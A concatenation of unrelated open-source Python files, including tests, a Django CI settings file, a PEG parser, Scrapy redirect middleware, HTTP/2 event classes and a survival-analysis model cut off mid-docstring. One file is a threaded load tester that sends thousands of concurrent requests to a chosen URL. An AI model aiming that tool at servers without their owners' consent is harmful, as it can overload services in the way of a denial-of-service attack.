self.assertEqual(np.sum(y), np.sum(x))
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
loss = model.train_on_batch(x, y)
self.assertGreater(loss, 0.1)
if __name__ == '__main__':
test.main()
| Xeralux/tensorflow | tensorflow/python/keras/_impl/keras/model_subclassing_test.py | Python | apache-2.0 | 19,733 |
from __future__ import unicode_literals
import sys
class C(object):
x = 'C_x'
def __init__(self):
self.y = 'c_y'
class D(C):
pass
if len(sys.argv) > 2:
v1 = C
else:
v1 = D
v2 = v1()
def f():
if len(sys.argv) > 3:
v3 = C()
else:
v3 = D()
return v3
def g(arg):
return arg
class X(object):
@classmethod
def method1(cls):
pass
@deco
def method2(self):
pass
v4 = g(f())
def deco(f):
return f
class Y(object):
@deco
def method2(self):
pass
v1
v2
v3
v4
list
def h(args):
if len(sys.argv) > 4:
v5 = C()
else:
v5 = D()
return v5, list(args)
def j():
return tuple, dict
dict
dict = 7
dict
tuple = tuple
tuple
from abc import abstractmethod
abstractmethod
from module import unknown
unknown
#Value of variables in inner functions
def outer():
y = 1
def inner(x):
return x + y + z + unknown + list
z = 2;
return inner
def outer_use_vars(x):
y = 1
def inner():
return x + y + z + unknown + list
z = 2;
y + z
return inner
y = lambda x : following()
def following():
pass
def params_and_defaults(a, b={}, c = 1):
a
b
c
def inner_cls():
class A(BaseException):
pass
a = A()
raise a
z
def multiple_assignment():
_tuple, _list = tuple, list
_tuple
_list
def vararg_kwarg(*t, **d):
t
d
class E(object):
def _internal(arg):
# arg is not a C
def wrapper(args):
return arg(args)
return wrapper
@_internal
def method(self, *args):
pass
x = 1
x
#Global in class scope
class F(object):
x = x
x
| github/codeql | python/ql/test/library-tests/PointsTo/lookup/test.py | Python | mit | 1,725 |
# pylint: skip-file
"""
Settings.py for testing on Circle CI.
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import sys
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = 'foobar' # nosec
DEBUG = False
ADMINS = [('Chris Karr', 'chris@audacious-software.com')]
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.gis',
'passive_data_kit'
)
MIDDLEWARE = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'passive_data_kit.circle_urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'pdk.wsgi.application'
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.postgis',
'NAME': 'circle_test',
'USER': 'root',
'PASSWORD': '',
'HOST': 'localhost',
'PORT': '',
}
}
# if 'test' in sys.argv or 'test_coverage' in sys.argv: #Covers regular testing and django-coverage
# DATABASES['default']['ENGINE'] = 'django.contrib.gis.db.backends.spatialite'
# SPATIALITE_LIBRARY_PATH = 'mod_spatialite'
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = 'static'
| audaciouscode/PassiveDataKit-Django | circle_settings.py | Python | apache-2.0 | 2,489 |
'''
Runs tests against exceptions defined in ``exception.py``
'''
import unittest
from sqlstr import exception
class Test_Exceptions(unittest.TestCase):
'''Test suite for sqlstr.exception'''
def test_sqlstrException(self):
'''Test the base exception sqlstr.exception.sqlstrException'''
test_exception = exception.sqlstrException("some exception")
self.assertIsInstance(test_exception, Exception,
"exception.sqlstrException is not a sub-class of Exception")
| GochoMugo/sql-string-templating | test/test_exception.py | Python | mit | 505 |
import _plotly_utils.basevalidators
class ValueValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(
self,
plotly_name="value",
parent_name="layout.scene.xaxis.tickformatstop",
**kwargs
):
super(ValueValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "plot"),
**kwargs
)
| plotly/plotly.py | packages/python/plotly/plotly/validators/layout/scene/xaxis/tickformatstop/_value.py | Python | mit | 454 |
from . import rd_parser as rd
def peg():
return rd.action('peg', rd.sequence([
rd.zero_or_more(_()),
parsing_header(),
rd.one_or_more(_()),
parsing_body(),
rd.end_of_file()
]))
def parsing_header():
return rd.action('noop', rd.sequence([
rd.string('GRAMMAR'),
rd.one_or_more(_()),
rd.one_or_more(parsing_rule_name())
]))
def parsing_body():
return rd.action('parsing_body', rd.one_or_more(rd.ordered_choice([
parsing_rule(),
rd.one_or_more(_())
])))
def parsing_rule():
return rd.action('parsing_rule', rd.sequence([
parsing_rule_name(),
rd.zero_or_more(_()),
rd.string('->'),
rd.zero_or_more(_()),
parsing_expression(),
rd.zero_or_more(_()),
rd.string(';'),
rd.zero_or_more(_())
]))
def parsing_rule_name():
return rd.action('noop', rd.sequence([
rd.regex_char('[a-zA-Z]'),
rd.zero_or_more(rd.regex_char('[a-zA-Z_]')),
]))
def parsing_expression():
return rd.action('parsing_expression', rd.ordered_choice([
parsing_sequence(),
parsing_ordered_choice(),
parsing_sub_expression()
]))
def parsing_sequence():
return rd.action('parsing_sequence', rd.sequence([
rd.ordered_choice([
parsing_ordered_choice(),
parsing_sub_expression()
]),
rd.one_or_more(rd.sequence([
rd.one_or_more(_()),
rd.ordered_choice([
parsing_ordered_choice(),
parsing_sub_expression()
])
]))
]))
def parsing_ordered_choice():
return rd.action('parsing_ordered_choice', rd.sequence([
parsing_sub_expression(),
rd.one_or_more(rd.sequence([
rd.zero_or_more(_()),
rd.string('/'),
rd.zero_or_more(_()),
parsing_sub_expression(),
]))
]))
def parsing_sub_expression():
return rd.action('parsing_sub_expression', rd.ordered_choice([
parsing_not_predicate(),
parsing_and_predicate(),
parsing_optional(),
parsing_one_or_more(),
parsing_zero_or_more(),
parsing_group(),
parsing_atomic_expression()
]))
def parsing_group():
return rd.action('parsing_group', rd.sequence([
rd.string('('),
rd.zero_or_more(_()),
rd.rec(parsing_expression),
rd.zero_or_more(_()),
rd.string(')')
]))
def parsing_atomic_expression():
return rd.action('parsing_atomic_expression', rd.ordered_choice([
parsing_string(),
parsing_regex_char(),
parsing_eof(),
parsing_rule_call()
]))
def parsing_not_predicate():
return rd.action('parsing_not_predicate', rd.sequence([
rd.string('!'),
rd.ordered_choice([
parsing_group(),
parsing_atomic_expression()
])
]))
def parsing_and_predicate():
return rd.action('parsing_and_predicate', rd.sequence([
rd.string('&'),
rd.ordered_choice([
parsing_group(),
parsing_atomic_expression()
])
]))
def parsing_zero_or_more():
return rd.action('parsing_zero_or_more', rd.sequence([
rd.ordered_choice([
parsing_group(),
parsing_atomic_expression()
]),
rd.string('*')
]))
def parsing_one_or_more():
return rd.action('parsing_one_or_more', rd.sequence([
rd.ordered_choice([
parsing_group(),
parsing_atomic_expression()
]),
rd.string('+')
]))
def parsing_optional():
return rd.action('parsing_optional', rd.sequence([
rd.ordered_choice([
parsing_group(),
parsing_atomic_expression()
]),
rd.string('?')
]))
def parsing_rule_call():
return rd.action('parsing_rule_call', parsing_rule_name())
def parsing_string():
return rd.action('parsing_string', rd.sequence([
rd.string('"'),
rd.one_or_more(rd.ordered_choice([
rd.string('\\"'),
rd.regex_char('[^"]'),
])),
rd.string('"')
]))
def parsing_regex_char():
return rd.action('parsing_regex_char', rd.ordered_choice([
rd.sequence([
rd.string('['),
rd.optional(rd.string('^')),
rd.one_or_more(rd.ordered_choice([
rd.string('\\]'),
rd.string('\\['),
rd.regex_char('[^\\]]'),
])),
rd.string(']')
]),
rd.string('.')
]))
def parsing_eof():
return rd.action('parsing_end_of_file', rd.string("EOF"))
def _():
return rd.action('noop', rd.regex_char('[\\s]'))
class SimplePegParser(object):
"""Class that allows you to parse PEG grammaras (EBNF-ish style)"""
parser = None
state = None
def __init__(self):
self.parser = peg()
def parse(self, text):
self.state = rd.State(
text=text,
position=0
)
ast = self.parser(self.state)
return ast
def get_last_expectations(self):
return self.state.last_expectations
def get_last_error(self):
return rd.get_last_error(self.state)
| SimplePEG/Python | simplepeg/speg_parser.py | Python | mit | 5,310 |
# Copyright 2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from copy import copy
from collections import OrderedDict, defaultdict
from wlauto.exceptions import ConfigError
from wlauto.utils.misc import load_struct_from_yaml, LoadSyntaxError
from wlauto.utils.types import counter, reset_counter
import yaml
def get_aliased_param(d, aliases, default=None, pop=True):
alias_map = [i for i, a in enumerate(aliases) if a in d]
if len(alias_map) > 1:
message = 'Only one of {} may be specified in a single entry'
raise ConfigError(message.format(aliases))
elif alias_map:
if pop:
return d.pop(aliases[alias_map[0]])
else:
return d[aliases[alias_map[0]]]
else:
return default
class AgendaEntry(object):
def to_dict(self):
return copy(self.__dict__)
class AgendaWorkloadEntry(AgendaEntry):
"""
Specifies execution of a workload, including things like the number of
iterations, device runtime_parameters configuration, etc.
"""
def __init__(self, **kwargs):
super(AgendaWorkloadEntry, self).__init__()
self.id = kwargs.pop('id')
self.workload_name = get_aliased_param(kwargs, ['workload_name', 'name'])
if not self.workload_name:
raise ConfigError('No workload name specified in entry {}'.format(self.id))
self.label = kwargs.pop('label', self.workload_name)
self.number_of_iterations = kwargs.pop('iterations', None)
self.boot_parameters = get_aliased_param(kwargs,
['boot_parameters', 'boot_params'],
default=OrderedDict())
self.runtime_parameters = get_aliased_param(kwargs,
['runtime_parameters', 'runtime_params'],
default=OrderedDict())
self.workload_parameters = get_aliased_param(kwargs,
['workload_parameters', 'workload_params', 'params'],
default=OrderedDict())
self.instrumentation = kwargs.pop('instrumentation', [])
self.flash = kwargs.pop('flash', OrderedDict())
if kwargs:
raise ConfigError('Invalid entry(ies) in workload {}: {}'.format(self.id, ', '.join(kwargs.keys())))
class AgendaSectionEntry(AgendaEntry):
"""
Specifies execution of a workload, including things like the number of
iterations, device runtime_parameters configuration, etc.
"""
def __init__(self, agenda, **kwargs):
super(AgendaSectionEntry, self).__init__()
self.id = kwargs.pop('id')
self.number_of_iterations = kwargs.pop('iterations', None)
self.boot_parameters = get_aliased_param(kwargs,
['boot_parameters', 'boot_params'],
default=OrderedDict())
self.runtime_parameters = get_aliased_param(kwargs,
['runtime_parameters', 'runtime_params', 'params'],
default=OrderedDict())
self.workload_parameters = get_aliased_param(kwargs,
['workload_parameters', 'workload_params'],
default=OrderedDict())
self.instrumentation = kwargs.pop('instrumentation', [])
self.flash = kwargs.pop('flash', OrderedDict())
self.workloads = []
for w in kwargs.pop('workloads', []):
self.workloads.append(agenda.get_workload_entry(w))
if kwargs:
raise ConfigError('Invalid entry(ies) in section {}: {}'.format(self.id, ', '.join(kwargs.keys())))
def to_dict(self):
d = copy(self.__dict__)
d['workloads'] = [w.to_dict() for w in self.workloads]
return d
class AgendaGlobalEntry(AgendaEntry):
"""
Workload configuration global to all workloads.
"""
def __init__(self, **kwargs):
super(AgendaGlobalEntry, self).__init__()
self.number_of_iterations = kwargs.pop('iterations', None)
self.boot_parameters = get_aliased_param(kwargs,
['boot_parameters', 'boot_params'],
default=OrderedDict())
self.runtime_parameters = get_aliased_param(kwargs,
['runtime_parameters', 'runtime_params', 'params'],
default=OrderedDict())
self.workload_parameters = get_aliased_param(kwargs,
['workload_parameters', 'workload_params'],
default=OrderedDict())
self.instrumentation = kwargs.pop('instrumentation', [])
self.flash = kwargs.pop('flash', OrderedDict())
if kwargs:
raise ConfigError('Invalid entries in global section: {}'.format(kwargs))
class Agenda(object):
def __init__(self, source=None):
self.filepath = None
self.config = None
self.global_ = None
self.sections = []
self.workloads = []
self._seen_ids = defaultdict(set)
if source:
try:
reset_counter('section')
reset_counter('workload')
self._load(source)
except (ConfigError, LoadSyntaxError, SyntaxError), e:
raise ConfigError(str(e))
def add_workload_entry(self, w):
entry = self.get_workload_entry(w)
self.workloads.append(entry)
def get_workload_entry(self, w):
if isinstance(w, basestring):
w = {'name': w}
if not isinstance(w, dict):
raise ConfigError('Invalid workload entry: "{}" in {}'.format(w, self.filepath))
self._assign_id_if_needed(w, 'workload')
return AgendaWorkloadEntry(**w)
def _load(self, source):
raw = self._load_raw_from_source(source)
if not isinstance(raw, dict):
message = '{} does not contain a valid agenda structure; top level must be a dict.'
raise ConfigError(message.format(self.filepath))
for k, v in raw.iteritems():
if k == 'config':
self.config = v
elif k == 'global':
self.global_ = AgendaGlobalEntry(**v)
elif k == 'sections':
self._collect_existing_ids(v, 'section')
for s in v:
if not isinstance(s, dict):
raise ConfigError('Invalid section entry: "{}" in {}'.format(s, self.filepath))
self._collect_existing_ids(s.get('workloads', []), 'workload')
for s in v:
self._assign_id_if_needed(s, 'section')
self.sections.append(AgendaSectionEntry(self, **s))
elif k == 'workloads':
self._collect_existing_ids(v, 'workload')
for w in v:
self.workloads.append(self.get_workload_entry(w))
else:
raise ConfigError('Unexpected agenda entry "{}" in {}'.format(k, self.filepath))
def _load_raw_from_source(self, source):
if hasattr(source, 'read') and hasattr(source, 'name'): # file-like object
self.filepath = source.name
raw = load_struct_from_yaml(text=source.read())
elif isinstance(source, basestring):
if os.path.isfile(source):
self.filepath = source
raw = load_struct_from_yaml(filepath=self.filepath)
else: # assume YAML text
raw = load_struct_from_yaml(text=source)
else:
raise ConfigError('Unknown agenda source: {}'.format(source))
return raw
def _collect_existing_ids(self, ds, pool):
# Collection needs to take place first so that auto IDs can be
# correctly assigned, e.g. if someone explicitly specified an ID
# of '1' for one of the workloads.
for d in ds:
if isinstance(d, dict) and 'id' in d:
did = str(d['id'])
if did in self._seen_ids[pool]:
raise ConfigError('Duplicate {} ID: {}'.format(pool, did))
self._seen_ids[pool].add(did)
def _assign_id_if_needed(self, d, pool):
# Also enforces string IDs
if d.get('id') is None:
did = str(counter(pool))
while did in self._seen_ids[pool]:
did = str(counter(pool))
d['id'] = did
self._seen_ids[pool].add(did)
else:
d['id'] = str(d['id'])
# Modifying the yaml parser to use an OrderedDict, rather then regular Python
# dict for mappings. This preservers the order in which the items are
# specified. See
# http://stackoverflow.com/a/21048064
_mapping_tag = yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG
def dict_representer(dumper, data):
return dumper.represent_mapping(_mapping_tag, data.iteritems())
def dict_constructor(loader, node):
return OrderedDict(loader.construct_pairs(node))
yaml.add_representer(OrderedDict, dict_representer)
yaml.add_constructor(_mapping_tag, dict_constructor)
| rockyzhang/workload-automation | wlauto/core/agenda.py | Python | apache-2.0 | 10,036 |
#!/usr/bin/python3
from queue import Queue
from queue import Empty
import time
import threading
import sys
import requests
import click
from requests.exceptions import ReadTimeout
from socket import error as socket_error
import logging
logging.basicConfig(filename='log.log', level=logging.INFO)
# Tests are loaded as (hits, workers,),
tests = [
(50, 50,),
(100, 100,),
(200, 200,),
(400, 400,),
(600, 600,),
(800, 800,),
(1000, 1000,),
(1500, 1500,),
(2000, 2000,),
(3000, 2000,),
(5000, 2000,)
]
def print_logo():
print('''\033[1;32m
_ _ _____
| | | | |____ |
| |_ ___ | | ___ _ __ __ _ _ __ ___ ___ / /
| __| / _ \ | | / _ \| '__| / _` || '_ \ / __| / _ \ \ \\
| |_ | (_) || || __/| | | (_| || | | || (__ | __/.___/ /
\__| \___/ |_| \___||_| \__,_||_| |_| \___| \___|\____/\033[m''')
def process_report(report, error_tolerance):
total_non_200 = 0
total_ms = 0
total_not_present = 0
result_codes = {'Timeouts': 0, 'Connection Errors': 0}
for r in report:
status_code = r.get('status_code')
total_ms += r.get('ms')
if status_code:
if status_code not in result_codes:
result_codes[status_code] = 0
result_codes[status_code] += 1
if status_code != 200:
total_non_200 += 1
if r.get('expect_not_present'):
total_not_present += 1
else:
total_non_200 += 1
if r.get('timeout'):
result_codes['Timeouts'] += 1
if r.get('connection_error'):
result_codes['Connection Errors'] += 1
if total_non_200 <= error_tolerance and total_not_present < error_tolerance:
test_passed = True
else:
test_passed = False
total_time = report[-1].get('tstop') - report[0].get('tstart')
total_success = len(report)-total_non_200
out = "%s success, %s failed, %.2f RPS, %.2fs ART, %.2fs Total" % \
(total_success, total_non_200, total_success/total_time, total_ms/1000/len(report), total_time)
if not test_passed:
out += '\n' + str(result_codes) + ' Not Present: ' + str(total_not_present)
return test_passed, out
def do_work(job):
tstart = time.perf_counter()
status_code = None
timeout = False
connection_error = False
expect_not_present = False
try:
result = requests.get(job.get('url'), timeout=job.get('timeout'))
status_code = result.status_code
if job.get('expect'):
if job.get('expect') not in result.text:
expect_not_present = True
except ReadTimeout:
timeout = True
except socket_error:
connection_error = True
return {'status_code': status_code, 'ms': (time.perf_counter()-tstart)*1000, 'timeout': timeout,
'connection_error': connection_error,
'tstart': tstart, 'tstop': time.perf_counter(), 'expect_not_present': expect_not_present}
def worker():
while True:
try:
job = q.get(True, 2)
except Empty:
break
result = do_work(job)
job.get('report').append(result)
q.task_done()
q = Queue()
@click.command()
@click.option('--url', prompt="URL to request", help='The URL to run the test on.')
@click.option('--timeout', default=10, help='Timeout in seconds before moving on.')
@click.option('--tolerance', default=5, help='How many errors will we tolerate?')
@click.option('--expect', default=None, help='Only consider a request valid if it sees this value in the response.')
def main(url, timeout, tolerance, expect):
print_logo()
print()
print("URL: %s" % url)
print("Timeout: %s Tolerance: %s" % (timeout, tolerance))
if expect:
print('Expecting: "%s"' % expect)
print()
print('RPS: Requests Per Second. (only counts successful requests)')
print('ART: Average Request Time. (includes timeouts etc)')
print()
for test in tests:
hits = test[0]
workers = test[1]
thread_stopper_start = time.perf_counter()
while threading.active_count() > 1:
time.sleep(0.1)
if time.perf_counter() - thread_stopper_start > 30:
print('Timed out while waiting for threads to spin down... Waited 30 seconds and still had %s '
'threads.' % str(threading.active_count()-1))
sys.exit(1)
print('%s hits with %s workers' % (hits, workers))
report = []
for i in range(workers):
try:
t = threading.Thread(target=worker)
t.daemon = True
t.start()
except RuntimeError:
print('Unable to create threads. What OS is this?')
sys.exit(1)
for item in range(hits):
q.put({'url': url, 'timeout': timeout, 'report': report, 'expect': expect})
q.join() # block until all tasks are done
logging.info(report)
test_passed, summary = process_report(report, tolerance)
if test_passed:
print('\033[1;32mPassed: ', end='')
else:
print('\033[1;31mFailed: ', end='')
print(summary + '\033[m')
print()
if not test_passed:
break
if __name__ == "__main__":
main()
| io-digital/hurt | tolerance3/tolerance3.py | Python | bsd-2-clause | 5,505 |
import os, sys
import config
def notify_user(msg):
sys.stderr.write(msg+'\n')
raw_input('Press enter to exit ')
sys.exit(1)
def run_cmd(cmd):
if os.system(cmd) != 0:
notify_user('Command "%s" failed!'%cmd)
def run_cmds(*cmds):
for cmd in cmds:
run_cmd(cmd)
if config.current != config.production:
notify_user('Change current configuration to production before running')
logo_dir = r'..\sandbox\logos\icons'
run_cmds(
r'png2ico harmonize_icon.ico %s\orangecircle16.png %s\orangecircle32.png %s\orangecircle48.png' % (logo_dir, logo_dir, logo_dir),
'python setup.py py2exe',
r'"C:\Program Files\Inno Setup 5\iscc" windows_installer.iss',
'pscp "Output\Harmonizer Setup.exe" harmonize.fm:/var/opt/uploaders')
raw_input('Publish completed successfully')
| JustinTulloss/harmonize.fm | uploader/publish_win.py | Python | mit | 800 |
from datetime import date
from unittest import TestCase
from opensrs.models import Domain
class DomainTestCase(TestCase):
def setUp(self):
domain_data = {
'f_let_expire': 'N',
'expiredate': '2016-11-02 12:17:12',
'f_auto_renew': 'N',
'name': 'foo.co.za'
}
self.domain = Domain(domain_data)
def test_has_expiry_date_attribute(self):
self.assertEqual(self.domain.expiry_date, date(2016, 11, 2))
def test_has_tld_attribute(self):
self.assertEqual(self.domain.tld, 'za')
def test_has_name_attribute(self):
self.assertEqual(self.domain.name, 'foo.co.za')
def test_has_auto_renew_attribute(self):
self.assertFalse(self.domain.auto_renew)
def test_has_to_dict_method(self):
expected_data = {
'name': 'foo.co.za',
'auto_renew': False,
'expiry_date': date(2016, 11, 2),
}
self.assertEqual(self.domain.to_dict(), expected_data)
| yola/opensrs | tests/test_models.py | Python | mit | 1,014 |
from urlparse import urljoin
from scrapy import log
from scrapy.http import HtmlResponse
from scrapy.utils.response import get_meta_refresh
from scrapy.exceptions import IgnoreRequest, NotConfigured
class BaseRedirectMiddleware(object):
enabled_setting = 'REDIRECT_ENABLED'
def __init__(self, settings):
if not settings.getbool(self.enabled_setting):
raise NotConfigured
self.max_redirect_times = settings.getint('REDIRECT_MAX_TIMES')
self.priority_adjust = settings.getint('REDIRECT_PRIORITY_ADJUST')
@classmethod
def from_crawler(cls, crawler):
return cls(crawler.settings)
def _redirect(self, redirected, request, spider, reason):
ttl = request.meta.setdefault('redirect_ttl', self.max_redirect_times)
redirects = request.meta.get('redirect_times', 0) + 1
if ttl and redirects <= self.max_redirect_times:
redirected.meta['redirect_times'] = redirects
redirected.meta['redirect_ttl'] = ttl - 1
redirected.meta['redirect_urls'] = request.meta.get('redirect_urls', []) + \
[request.url]
redirected.dont_filter = request.dont_filter
redirected.priority = request.priority + self.priority_adjust
log.msg(format="Redirecting (%(reason)s) to %(redirected)s from %(request)s",
level=log.DEBUG, spider=spider, request=request,
redirected=redirected, reason=reason)
return redirected
else:
log.msg(format="Discarding %(request)s: max redirections reached",
level=log.DEBUG, spider=spider, request=request)
raise IgnoreRequest
def _redirect_request_using_get(self, request, redirect_url):
redirected = request.replace(url=redirect_url, method='GET', body='')
redirected.headers.pop('Content-Type', None)
redirected.headers.pop('Content-Length', None)
return redirected
class RedirectMiddleware(BaseRedirectMiddleware):
"""Handle redirection of requests based on response status and meta-refresh html tag"""
def process_response(self, request, response, spider):
if 'dont_redirect' in request.meta:
return response
if request.method == 'HEAD':
if response.status in [301, 302, 303, 307] and 'Location' in response.headers:
redirected_url = urljoin(request.url, response.headers['location'])
redirected = request.replace(url=redirected_url)
return self._redirect(redirected, request, spider, response.status)
else:
return response
if response.status in [302, 303] and 'Location' in response.headers:
redirected_url = urljoin(request.url, response.headers['location'])
redirected = self._redirect_request_using_get(request, redirected_url)
return self._redirect(redirected, request, spider, response.status)
if response.status in [301, 307] and 'Location' in response.headers:
redirected_url = urljoin(request.url, response.headers['location'])
redirected = request.replace(url=redirected_url)
return self._redirect(redirected, request, spider, response.status)
return response
class MetaRefreshMiddleware(BaseRedirectMiddleware):
enabled_setting = 'METAREFRESH_ENABLED'
def __init__(self, settings):
super(MetaRefreshMiddleware, self).__init__(settings)
self._maxdelay = settings.getint('REDIRECT_MAX_METAREFRESH_DELAY',
settings.getint('METAREFRESH_MAXDELAY'))
def process_response(self, request, response, spider):
if 'dont_redirect' in request.meta or request.method == 'HEAD' or \
not isinstance(response, HtmlResponse):
return response
if isinstance(response, HtmlResponse):
interval, url = get_meta_refresh(response)
if url and interval < self._maxdelay:
redirected = self._redirect_request_using_get(request, url)
return self._redirect(redirected, request, spider, 'meta refresh')
return response
| pablohoffman/scrapy | scrapy/contrib/downloadermiddleware/redirect.py | Python | bsd-3-clause | 4,231 |
# -*- coding: utf-8 -*-
"""
h2/events
~~~~~~~~~
Defines Event types for HTTP/2.
Events are returned by the H2 state machine to allow implementations to keep
track of events triggered by receiving data. Each time data is provided to the
H2 state machine it processes the data and returns a list of Event objects.
"""
from collections import namedtuple
class RequestReceived(object):
"""
The RequestReceived event is fired whenever request headers are received.
This event carries the HTTP headers for the given request and the stream ID
of the new stream.
"""
def __init__(self):
self.stream_id = None
self.headers = None
class ResponseReceived(object):
"""
The ResponseReceived event is fired whenever request headers are received.
This event carries the HTTP headers for the given response and the stream
ID of the new stream.
"""
def __init__(self):
self.stream_id = None
self.headers = None
class DataReceived(object):
"""
The DataReceived event is fired whenever data is received on a stream from
the remote peer. The event carries the data itself, and the stream ID on
which the data was received.
"""
def __init__(self):
self.stream_id = None
self.data = None
class WindowUpdated(object):
"""
The WindowUpdated event is fired whenever a flow control window changes
size. HTTP/2 defines flow control windows for connections and streams: this
event fires for both connections and streams. The event carries the ID of
the stream to which it applies (set to zero if the window update applies to
the connection), and the delta in the window size.
"""
def __init__(self):
self.stream_id = None
self.delta = None
class RemoteSettingsChanged(object):
"""
The RemoteSettingsChanged event is fired whenever the remote peer changes
its settings. It contains a complete inventory of changed settings,
including their previous values.
In HTTP/2, settings changes need to be acknowledged. hyper-h2 does not
automatically acknowledge them, because it is possible that the caller may
not be happy with the changed setting (or would like to know about it).
When this event is received, the caller should confirm that the new
settings are acceptable, and then acknowledge them. If they are not
acceptable, the user should close the connection.
"""
#: A value structure for storing changed settings.
ChangedSetting = namedtuple(
'ChangedSetting', ['setting', 'original_value', 'new_value']
)
def __init__(self):
self.changed_settings = {}
@classmethod
def from_settings(cls, old_settings, new_settings):
"""
Build a RemoteSettingsChanged event from a set of changed settings.
:param old_settings: A complete collection of old settings, in the form
of a dictionary of ``{setting: value}``.
:param new_settings: All the changed settings and their new values, in
the form of a dictionary of ``{setting: value}``.
"""
e = cls()
for setting, new_value in new_settings.items():
original_value = old_settings.get(setting)
change = cls.ChangedSetting(setting, original_value, new_value)
e.changed_settings[setting] = change
return e
class PingAcknowledged(object):
"""
The PingAcknowledged event is fired whenever a user-emitted PING is
acknowledged. This contains the data in the ACK'ed PING, allowing the
user to correlate PINGs and calculate RTT.
"""
def __init__(self):
self.ping_data = None
class StreamEnded(object):
"""
The StreamEnded event is fired whenever a stream is ended by a remote
party. The stream may not be fully closed if it has not been closed
locally, but no further data or headers should be expected on that stream.
"""
def __init__(self):
self.stream_id = None
class StreamReset(object):
"""
The StreamReset event is fired whenever a stream is forcefully reset by the
remote party. When this event is received, no further data can be sent on
the stream.
"""
def __init__(self):
self.stream_id = None
self.error_code = None
class PushedStreamReceived(object):
"""
The PushedStreamReceived event is fired whenever a pushed stream has been
received from a remote peer. The event carries on it the new stream ID, the
ID of the parent stream, and the request headers pushed by the remote peer.
"""
def __init__(self):
self.pushed_stream_id = None
self.parent_stream_id = None
self.headers = None
| mhils/hyper-h2 | h2/events.py | Python | mit | 4,782 |
<selection>#comment line
a = 1</selection> | allotria/intellij-community | python/testData/surround/SurroundCommentAtStart.py | Python | apache-2.0 | 42 |
#!/bin/python
# -*- coding: utf-8 -*-
# Fenrir TTY screen reader
# By Chrys, Storm Dragon, and contributers.
from fenrirscreenreader.core import debug
class command():
def __init__(self):
pass
def initialize(self, environment):
self.env = environment
def shutdown(self):
pass
def getDescription(self):
return _('get current help message')
def run(self):
text = self.env['runtime']['helpManager'].getHelpForCurrentIndex()
self.env['runtime']['outputManager'].presentText(text, interrupt=True)
def setCallback(self, callback):
pass
| chrys87/fenrir | src/fenrirscreenreader/commands/help/curr_help.py | Python | lgpl-3.0 | 656 |
from __future__ import absolute_import
import torch
import numpy as np
import pandas as pd
import scipy
import copy
from pysurvival import HAS_GPU
from pysurvival import utils
from pysurvival.utils import neural_networks as nn
from pysurvival.utils import optimization as opt
from pysurvival.models import BaseModel
from pysurvival.models._coxph import _CoxPHModel
from pysurvival.models._coxph import _baseline_functions
class CoxPHModel(BaseModel):
""" Cox proportional hazards model:
-------------------------------
The purpose of the model is to evaluate simultaneously
the effect of several factors on survival.
In other words, it allows us to examine how specified factors
influence the rate of a particular event happening
at a particular point in time.
The Cox model is expressed by the hazard function h(t)
(the risk of dying at time t. )
It can be estimated as follow:
h(t, x)=h_0(t)*exp(<x, W>)
Then the Survival function can be calculated as follow:
H(t, x) = cumsum( h(t, x) )
S(t, x) = exp( -H(t, x) )
Reference:
* http://www.sthda.com/english/wiki/cox-proportional-hazards-model
"""
def get_summary(self, alpha = 0.95, precision=3):
""" Providing the summary of the regression results:
* standard errors
* z-score
* p-value
"""
# Flattening the coef
W_flat = self.weights.flatten()
# calculating standard error
self.std_err = np.sqrt(self.inv_Hessian.diagonal())/self.std_scale
# Confidence Intervals
alpha = scipy.stats.norm.ppf((1. + alpha) / 2.)
lower_ci = np.round( W_flat - alpha * self.std_err, precision)
upper_ci = np.round( W_flat + alpha * self.std_err, precision)
z = np.round(W_flat / self.std_err , precision)
p_values = np.round(scipy.stats.chi2.sf( np.square(z), 1), precision)
W = np.round(W_flat, precision)
std_err = np.round(self.std_err, precision)
# Creating summary
df = np.c_[self.variables, W, std_err,
lower_ci, upper_ci, z, p_values]
df = pd.DataFrame(data = df,
columns = ['variables', 'coef', 'std. err',
'lower_ci', 'upper_ci',
'z', 'p_values'])
self.summary = df
return df
def fit(self, X, T, E, init_method='glorot_normal', lr = 1e-2,
max_iter = 100, l2_reg = 1e-2, alpha = 0.95,
tol = 1e-3, verbose = True ):
"""
Fitting a proportional hazards regression model using
the Efron's approximation method to take into account tied times.
As the Hessian matrix of the log-likelihood can be
calculated without too much effort, the model parameters are
computed using the Newton_Raphson Optimization scheme:
W_new = W_old - lr*<Hessian^(-1), gradient>
Arguments:
---------
